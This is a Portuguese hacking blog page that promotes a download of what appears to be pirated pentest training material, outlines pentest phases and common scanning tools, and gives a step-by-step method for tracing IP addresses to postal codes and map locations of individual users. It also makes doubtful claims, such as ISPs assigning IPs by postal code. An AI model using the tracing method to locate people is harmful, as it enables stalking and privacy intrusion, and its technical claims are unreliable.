Então, senhores, queREm ser um pentesters? TENHA DOIS PCS, E DUAS REDES ISOLADAS ONDE VOCÊ USA CADA COMPUTADOR EM CADA UMA ISOLANDO-OS, PARA ATACAR DE VERDADE E COM BRUTALIDADE. SÓ ASSIM, PODERÁ GARANTIR A SEGURANÇA!

NÃO SIMULE NADA, ATAQUE DE VERDADE! MÁQUINAS VIRTUAIS E USAR A MESMA REDE MASCARAM O PENETRATION TEST!

Amigos hackers, é com enorme prazer que lhes passo esta informação pois compartilhar o bem com vocês é a minha missão.

KIT treinamento Pentest BT - 8 horas de vídeo e 3 livros +400 páginas cada

Profissionais da área DE SEGURANÇA de extrema qualidade e singularidade.

Segue um kit de treinamento para PENETRATION TEST com mais de 200 ferramentas de hacking avançadas usando o LINUX BACKTRACK.

Este kit vem com os seguintes materiais inclusos e se encontra compactado em rar no 4shared.

http://www.4shared.com/file/_QzE-qwe/Teste_de_Penetrao_Avanado_-_8_.html 

CONTEÚDO:

Vídeo cursos da Offensive Security referente ao Backtrack e suas ferramentas de penetration test. CURSO EM VÍDEO DE PENETRATION TEST.

PLAYER SWF INCLUSO PARA RODAR OS VÍDEOS.

3 VÍDEO CURSOS TOTALIZANDO CERCA DE 8 HORAS DE TREINAMENTOS COM AS MAIS AVANÇADAS TÉCNICAS DE INVASÃO USANDO O BACKTRACK!

Livros: Cada um com mais de 400 páginas cada! É para nunca mais você reclamar de falta de material de estudo de alta qualidade! Para mais de 200 ferramentas de hacking do LINUX BACKTRACK!

BackTrack-4-Assuring-Security-by-Penetration-Testing
Penetration Test with BackTrack Ebook
Offensive-security-labs - PRÁTICA DO LABORATÓRIO PARA PENTEST



TUDO AQUI É PRÁTICO, POUCO TEORIA E MUITA PRÁTICA É ASSIM QUE SE APRENDE!

Isto é um kit de treinamento que nenhum outro curso de hacker se compara! Eu nunca encontrei nada melhor do que isso compartilhado.

TUDO EM INGLÊS.

PenTest (Teste de Vulnerabilidade)

O que pretendo discutir com os nossos colegas é quais são as ferramentas e métodos que utilizam para enumeração ,scanning e testes de vulnerabilidades em redes, sejam essas ferramentas para uso online ou em nossa maquina.
1. Penetration testing

Penetration-test é o método usado para testar e descobrir vulnerabilidades numa rede e a possibilidade de ver como estas podem ser exploradas ou corrigidas.

Para ser feito um teste de penetração são contratados profissionais (ou pessoas internas à rede) para explorar a rede, da mesma forma que um cracker faria e em seguida são entregues os resultados indicando todas as falhas encontradas e como corrigi-las.

Para se fazer um teste de penetração é necessário passar diversas fases, para as quais são utilizadas diversas ferramentas. As fases serão indicadas nos pontos seguintes.
1.1- Reconhecimento da rede

A enumeração consiste no reconhecimento da rede e dos sistemas atingíveis. Os resultados esperados são: nomes de domínios, nomes de servidores, informação do ISP, endereços IP envolvidos e também um mapa da rede. Inclui ainda informação de registros de domínios para os servidores.

Para fazer o reconhecimento da rede, podem ser utilizadas diversas ferramentas e técnicas, conforme o objectivo do ataque. Indico abaixo algumas ferramentas, que poderão ser usadas no reconhecimento.

• Nslookup – funciona em Windows e Linux. Serve para mapear endereços IP para um determinado domínio.

• Whois –Nos dá toda a informação sobre um domínio registado (entidade que registou, endereço físico, contactos, domain servers, etc)

• ARIN

• Dig – serve para perguntar a um servidor DNS informação acerca de outras coisas, por exemplo, a versão do name server que a empresa está a utilizar…

• Engenharia social

• Web site alvo
1.2-Scanning

Nesta fase de um teste de penetração é a identificação de portas abertas e serviços a correr, na máquina(s) ou rede alvo, chegando assim a enumeração de vulnerabilidades no alvo.

Também nesta fase do teste podemos incluir diversas ferramentas e tecnicas, conforme o objectivo do teste e a configuração da máquina/rede alvo. Ferramentas deste tipo foram analisadas no ponto 3 deste mesmo relatório.

As ferramentas mais utilizadas para fazer scanning, são:

• telnet –Serve para mostrar informação sobre uma aplicação ou serviço (versão, plataforma.

• nmap – port scanner

• hping2 – port scanner

• netcat – port scanner

• ping – testa conectividade IP

• traceroute – Ele conta os “hops” da rede, desde a máquina em que é executado até à máquina/sistema alvo.

• queso – OS fingerprinting.
1.3- Teste de vulnerabilidade

Os testes de vulnerabilidades consistem na determinação de que buracos de segurança e vulnerabilidades podem ser aplicadas à rede/máquina alvo. Quem efectuar o teste vai tentar identificar nas máquinas na rede alvo todas as portas abertas, sistemas operativos e aplicações a serem executadas; incluindo o sistema operativo, patches aplicados e service packs aplicados.

Nas etapas anteriores, são identificadas as máquinas que estão ligadas e que portas e serviços têm disponíveis.

Existe, na geral quatro categorias de vulnerabilidades que podem ser encontradas:

• Os bugs específicos do sistema operativo, exploits, vulnerabilidades e buracos de segurança

• As fraquezas no firewall e routers, entre diversas marcas

• A exploração de scripts de web server

• As partilhas e confianças exploráveis entre sistemas e pastas.

O scan de vulnerabilidades pode ser feito de várias formas, que indicarei nos pontos seguintes.
1.3.1- Ferramentas e Manuais

As análises das vulnerabilidades de um computador pode ser feita manualmente, com base na informação recolhida nos pontos anteriores. Ou seja, são percorridas as listas de vulnerabilidades existentes, em busca de alguma que possa existir para cada uma das aplicações instaladas na máquina.
1.3.2- Nessus

O Nessus é a melhor ferramenta para inventariar vulnerabilidades com código fonte disponível.

Instalação

Esta ferramenta é constituida por duas partes: o cliente e o servidor, que podem ou não, ser instaladas em máquinas diferentes.
A instalação é bastante simples:

• executa-se a script de instalação
• adiciona-se um utilizador

Utilização

O Nessus tem de ter o servidor instalado numa máquina *IX, mas o cliente pode ser executado em Windows ou em *IX.

O cliente desta ferramenta, pode correr em modo gráfico ou em modo de comando. O modo de comando tem a vantagem de poder ser incluído em scripts, o modo gráfico tem a vantagem de ser facilmente seleccionável quais os testes de vulnerabilidade que são executados.
1.3.3- SARA-Security Auditor’s research assistant

O SARA é um scanner de rede, que procura serviços e os analisa.
Esta ferramenta produz relatórios em diversos formatos: html, XML, interactivos e CSV, importável para folhas de cálculo.

Instalação

A instalação do SARA é muito simples: basta descomprimir o tgz, e executar ./configure, make, make install.

Relativamente à configuração, podem fazer-se algumas configurações específicas, mas deixando tudo o que vem por default, obtêm-se resultados interessantes.

Utilização

O SARA pode ser executado em três modos: interactivo (interface web), linha de comando, ou modo remoto.. No caso presente, optei pelo modo interactivo.

O modo remoto pode ser útil, no caso de se desejar ter o servidor de SARA numa determinada máquina e um cliente gráfico, na própria máquina.

Este modo tem algumas limitações: só é permitido um utilizador de cada vez, um teste não pode ser interrompido, o servidor não foi feito para ficar permanentemente à espera de pedidos, é preciso ter preocupações com a segurança.

Pode ser definido o tipo de “ataque” que é feito à máquina/rede em causa. Pode variar entre cinco níveis de severidade.
1.3.4- Comparação entre detectores de vulnerabilidades

A detecção manual de vulnerabilidades é, com certeza a que permite mais pormenor, mas é muito difícil de ser implementada com perfeição.

Relativamente às duas ferramentas utilizadas, o SARA é, sem dúvida, mais rápida, mas é também a menos eficiente. Além de apresentar resultados muito menos detalhados e não apresentar formas de resolução das vulnerabilidades (como o Nessus), apresenta falsos positivos.

Relativamente à forma de apresentação de resultados, o SARA é muito inferior. O servidor tem ainda problemas de funcionamento, no sentido que entre dois testes, se não for removido, não funciona corretamente.

Tem no entanto, uma funcionalidade interessante, que é ir guardando e apresentando em paralelo os resultados de testes anteriores.

Esta característica pode ser interessante, do ponto de vista de armazenamento de informação sobre todo o parque de servidores de uma empresa, por exemplo.

Rastreando IP´s


1º - Passo

Rastreando ip

Achei esses links interessantes, eles mostram a Cidade/País/CEP de um IP informado.
E claro, não é 100% correto mas dá pra ter uma idéia legal do endereço.

Então vamos há algumas explicações dos passos para rastrear um IP.
Primeiro é bom distinguir IPs nacionais dos internacionais, no Brasil a faixa inicial geralmente são:
200.x.x.x e 201.x.x.x, não é regra, há alguns com 207.x.x.x por exemplo mas não é tão comum.
É necessário saber isto para agilizar sua busca, pois não adianta procurar no sistema de consulta de CEPs um IP lá da China.
Mas como cérebro foi feito pra lembrar a programação da TV e não números, aqui vai a solução: http://www.maxmind.com/app/lookup
Informe o IP, e será mostrado de qual ele pertence.

______________________________

Agora entendendo um pouco de como os sistemas de buscas relacionam CEPs com IPs:

Bom tudo começa das estruturas físicas da rede, físico me refiro a fios, postes, caixas telefônicas, localização do provedor, etc. Quando você recebe um IP, seu provedor gera ele apartir do seu CEP(não é bem um cálculo com seu CEP e sim questão de proximidades).

Explico: Supomos que você recebeu o IP 200.196.196.5 e seu vizinho recebeu 200.150.30.2, sendo que ele mora no mesmo CEP que vc, o que aconteceria é que o ping(tempo para recebimento de pacotes) demoraria(suposição) uns 150ms(isso é lento, sim eu amo parenteses :lol.

O que na realidade deveria ser uns 70ms mais ou menos.
Então o provedor lhe atribui IPs conforme seu CEP, sendo assim seu vizinho provavelmente receberá um IP semelhante ao seu, pelo menos na teoria seria assim, ao menos que se escasse os IPs semelhantes, mas aí é outro papo.
Entendido isso de CEP x IP, vamos a forma de rastreá-los.

Há um projeto nacional chamado IPGeo mantido pelo Portal RankBrasil, que mantêm um banco de dados com uma relação imensa de IPs -> CEPs. Bom ao certo de onde eles colhem essas informações eu não sei, suponho que seja algo vinculado aos provedores e ao Registro.br.

Então vamos lá, acesse o site: http://www.cadari.com.br/
E informe o IP que deseja consultar, como exemplo vou usar o meu atual: IP 200.203.3.62
O que vai acontecer, o sistema irá sempre mostrar uma série de resultados, pois são os IPs mais semelhantes ao seu, caso encontre
exatamente o IP informado, ele irá ser mostrado no topo da lista.

Resultado obtido:

Citação:
Proximidades de IP com CEPs confirmados

200.203.3.62 95020180 Caxias do Sul RS
200.203.3.63 95180000 Farroupilha RS
200.203.3.63 95700000 Bento Gonçalves RS
200.203.3.64 95020320 Caxias do Sul RS
200.203.3.64 95020460 Caxias do Sul RS
200.203.3.64 95097000 Caxias do Sul RS
200.203.3.65 95010100 Caxias do Sul RS
Próximo passo, como localizou meu IP exato, procurei no site dos correios o CEP que me apresentou.
http://www.correios.com.br/servicos/cep/cep_cep.cfm



Sim, o endereço tá correto mesmo, aqui da empresa.
Ah detalhe bastante importante, MEU IP NÃO É FIXO NEM EMPRESARIAL.

Agora acontece também de não mostrar o IP informado e sim só os das proximidades, então caso saiba mais informações(como a cidade por exemplo) sobre o IP que está consultando, lhe ajudará a filtrar os resultados mostrados.
Acontece também de não mostrar corretamente a cidade, acredito que ocorre pois o banco de dados pode estar desatualizado, sendo que é feito a nova verificação a cada 24h, então caso tenha certeza que o resultado mostrado está incorreto, anote o IP e consulte novamente dentro de algumas horas ou no dia seguinte.
Básicamente para IPs nacionais seria isso, como eu falei não é 100% mas ajuda.
Ainda em buscas no Brasil temos outro recurso que é o Registro.br(www.registro.br).
Já essa alternativa é mais adequada de quando estamos consultando IPs(fixos) de servidores, os quais estão registrados um dominío, um IP fixo empresarial, etc.
Caso consultar um IP dinâmico qualquer, provavelmente os resultados serão os dados do companhia de telecomunicações da região, como Brasil Telecom.
Exemplo, consultei pelo meu IP:

Citação:
...
inetnum: 200.203.0/17
asn: AS8167
ID abusos: BTA17
entidade: Brasil Telecom S/A - Filial Distrito Federal
documento: 076.535.764/0326-90
responsável: Brasil Telecom S. A. - CNRS
endereço: SEPS 702/092 Cj. B - Bl B 3 andar Gen. Alencastro, S/N,
endereço: 70390-025 - Brasilia - DF
telefone: (61) 415-4201 []
ID entidade: BTC14
ID técnico: BTC14
inetrev: 200.203.0/24
servidor DNS: ns3.brasiltelecom.net.br
...
Agora outra consulta, mas pelo IP 200.176.3.142
Citar
Citação:
...
inetnum: 200.176/16
asn: AS11706
ID abusos: ABT82
entidade: Terra Networks Brasil S.A.
documento: 091.088.328/0003-29
responsável: Hostmaster Terra Networks
endereço: João Manoel, 90,
endereço: 90010-030 - Porto Alegre - RS
telefone: (51) 32844000 []
ID entidade: MPL4
ID técnico: MPL4
inetrev: 200.176.0/18
servidor DNS: ns1.terra.com.br
...
Como deu pra notar, é o IP do terra.com.br, então essa é a diferença de um IP registrado.
______________________________

Mas e no caso de um IP que não seja do Brasil ?
Bom aí se fizermos pelo método anterior não teremos resultados precisos. Para isso há outro site americano, MaxMind
que disponibiliza recursos semelhantes ao IPGeo.
Acesse: http://www.maxmind.com/app/lookup_city

E a teoria é a mesma, porém como é outro país o sistema de caixa postal (CEP) será diferente.

Então como saber onde procurar, aqui: http://www.embassyworld.com/Zip_Codes/

há uma listagem de serviços e sites que buscam códigos postais de diversos países.

Vamos a um exemplo na prática!
Enquanto estava no painel de administração do Fanta Hackers observei que tinha um visitante com IP do exterior, esse: 65.214.39.151

Fiquei curioso e resolvi rastrear ele, vamos aos passos:

- Descobrindo País/Cidade/Estado

Resultado:





- Como ninguém nasceu de susto, vamos confirmar realmente se o MaxMind trouxe informações boas. Para isso consultaremos também no Whois (http://lacnic.net/cgi-bin/lacnic/whois?lg=EN) que é o substituto do Registro.br mas para consultar internacionais.

Então tudo certo, os dados estão corretos mesmo:


Citação:
OrgName: AskJeeves, Inc.
OrgID: C00555427
Address: 5858 Horton Street
City: Emeryville
StateProv: CA
PostalCode: 94608
Country: US
Bom essa foi fácil, como deu pra notar é um IP empresarial no qual já nos mostrou inclusive o nome da organização AskJeeves

- Uma consulta rápida no oráculo pela empresa e chegamos ào google
- Pra quem deduziu, descobrimos já quem é nosso visitante. Como trata-se de um portal de buscas, o nosso convidado é um WebBot que esta catalogando os dados contidos no Fanta.

Mas vamos continuar a busca:

- Acesse https://maps.google.com/ e informe o nome da empresa AskJeeves
- Altere o modo de visualização para Hybrid(imagem de satélite + nomeclatura de ruas)

- Ao lado, irá nos mostrar uma listagem de diversas filiais da empresa, como já sabemos que a desejada encontra-se em Emeryville - California, selecionamos esta.

- Chegamos ao resultado preciso abaixo:




Alguém quer fazer uma visita a eles?
Porém como citei antes, essa foi fácil, localizar uma empresa não é nada complicado. Mas e no caso de um usuário internacional comum?
Nesse ponto nossos recursos se restringem um pouco, mas vamos ver até onde conseguimos chegar.

Nosso IP de exemplo será: 69.18.1.201

- Consultando a localização http://www.maxmind.com/app/lookup_city

Esta imagem foi redimensionada. Clique nesta barra para ver a imagem completa. A imagem original é de tamanho 817x114.


- O que identificamos: Local Internet Service Company, bom agora complicou pois não é tão simples como antes, descobrimos que o IP é de um Provedor de Internet.
Ou seja, um usuário comum.

- Seguimos direto para o Google Maps e informamos os dados da cidade:

- Nesse caso o melhor modo de visualização é Map;
- Como essa cidade Fairfield parece ser o lugar onde o diabo perdeu as meias, o zoom no mapa é bem limitado:



- Então vamos tentar no MapQuest(http://www.mapquest.com/) e informamos o código postal: 52556
Bom, um pouco mais detalhado...




Com isso as informações que temos, consiguimos chegar até este ponto, não obtivemos o endereço específico, mas uma noção boa da localização.

______________________________


Bom, então o passo-a-passo que eu sugestionaria para iniciar um rastreamento seria os seguinte:
- Analise o IP e descubra qual seu país;
http://www.maxmind.com/app/lookup

- Sabendo a nacionalidade:

* Se for nacional:


1) Consulte no http://www.registro.br/

2) Se constatar que o IP não está registrado, pesquise novamente em http://www.cadari.com.br/

3) Tendo o CEP em mãos, consulte ele http://www.correios.com.br/servicos/cep/cep_cep.cfm

* Caso seja internacional:

1) Busque primeiro no Whois: http://lacnic.net/cgi-bin/lacnic/whois?lg=EN

2) Senão retornar nada útil tente em: http://www.maxmind.com/app/lookup_city

3) Descoberto o país, consulte em http://www.embassyworld.com/Zip_Codes/

4) Acesse algum dos sites da lista referente ao país do IP

5) Busque pelo código postal localizado

6) Caso seja americano, uma boa dica é procurar no Google Maps

TERMINEI..

Pronto tá ae.
Leia com atenção e faça bom proveito

Não é 100% em todos os casos mas vale a pena tenta!
Postagens mais antigas → Página inicial
Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86